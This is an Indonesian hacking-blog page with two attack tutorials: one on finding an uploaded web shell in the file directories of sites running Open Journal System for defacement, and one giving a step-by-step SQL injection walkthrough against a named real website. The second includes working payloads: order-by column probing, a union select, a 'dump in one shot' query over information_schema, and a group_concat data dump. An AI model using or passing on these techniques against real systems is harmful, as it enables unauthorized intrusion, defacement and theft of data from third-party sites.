Termux ID: Deface -->

    Cara Mencari Akses Shell Di CMS Open Journal System

        Mungkin banyak yg coba deface methode Open Journal System ini karna caranya lumayan cukup gampang , tapi banyak orang yg bermasalah pada saat mencari akses Sell / Script yg telah di upload.ya kali ini gw akan bahas tentang Cara Mencari Akses Shell Di CMS Open Journal System.

Yg pasti kalian udah tau atau mengerti cara deface Open Journa System bagi yg belum coba baca atau tanya ke mbah google , langsung aja ikutin step by step nya.

1.Setelah kalian pilih-pilih target , kalian jangan langsung register + tanam shell , Kalian periksa dahulu apakah direktori tempat shell kalian nanti ada atau kagak..

2.Cara cek nya simple, cukup tambahkan /files di belakang url target kalian contoh : http://target.co.li/files



                                                  (NOT VULN / TIDAK BISA DI TUSBOLD :V)
Kalau sering dapet yg kagak vuln mungkin itu evek ketampanan (faktor face) cuba ganti muka atau download yg baru...mungkin dg otak vokepers mu itu bisa mencari cara untuk mencari akses file nya.



                                                              (BISA VULN BISA TIDAK)

     Nah kalau yg kayak gini bisa vuln , bisa tidak .



                                                      (ITS VULN /DI TUSBOLD ENAK :V)


Yg kayak gini vuln , jngan lupa pastikan ada direktori Journalsnya biar di langkah selanjutnya gk bingung :v ok kita lanjutkan coly nya....

3.kalo udah vuln kayak gambar yg no 3 (kurang lebih , karna terkdang ada tampilan yg berbeda)

4.Setelah tanam shell berhasill, kalian balik lagi ke direktori files, kaya contoh di atas (gambar no.3), lalu kalian klik direktori journals -> (keluar angka-angka) pas di bagian di situ mungkin ada direktori angka yang lebih dari 1 -> ke direktori articles -> direktori id user kalian (angka, baca di tutrial deface ojs) -> lanjut ke direktori submission -> lanjut lagi ke direktori original -> nama file kalian.


Udah paham cok??kalau belum makanya jangan kebanyakan nonton vidio anu .....
sekian dulu totor gk guna kali ini , kalau masih bingung atau yg belum mengerti tutorial di atas bisa tanya-tanya ke SINI (awas orang ganteng  hati2 naksir) atau bisa juga ke SONO.

Spesial thanks to :"Kurniawan PS , Rival " "Garuda Security Hacker And Hacker Patah Hati Team .

Sekian salam jomblo.

Cara Mencari Akses Shell Di CMS Open Journal System






oke guys ketemu lg neh sama cakil :v
kali ini saya akan kasih tutorial sqli dengan dios (dump in shoot)
langsung ae guys
dork : sini
ok karna saya lg kurang beruntung ga ketemu list admon nya maka saya akan
ngasih tau dump nya sadja oc :v

ok saya anggap lu udah punya target :v
http://smtmax.com/category.php?id=15
lanjut masukan kode order by



+order+by+1--+ <- ga error
 +order+by+2--+ <- ga error
 dan seterus nya.. dan erorr nya ternyata ada di
 +order+by+15--+ (yang berarti column hanya di 14)
oke kita masukan
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+ 
(liat gambar di atas)
jadinya akan terlihat seperti ini
http://smtmax.com/category.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+

dan muncul angka 3 dan kita masukan dios nya :v
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
 
jadi akan seperti ini 
http://smtmax.com/category.php?id=15+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),4,5,6,7,8,9,10,11,12,13,14--+
(lihat gambar) :v
disini saya akan mendump id,longname,descs (karna tempat admon nya ga tau :v )
 ok masukan
group_concat(id,0x3a,longname,descs) <- karna saya mendump id,longname dan descs bukan admon ea :v kurang beruntung saya kwkwkwkwk :v 
nanti akan terlihat column yang kita dump
(liat gambar)
nanti akan seperti ini
http://smtmax.com/category.php?id=15+union+select+1,2,group_concat(id,0x3a,longname,descs),4,5,6,7,8,9,10,11,12,13,14+from+cms_category--+

nah sudah muncul tuh :v mudah kan ?
ok sekian dan terima kasih :) kalo ada yang ingin di tanya kan silahkan
tanyakan di fp kami
link
 

Cara Mudah SQLI With Dios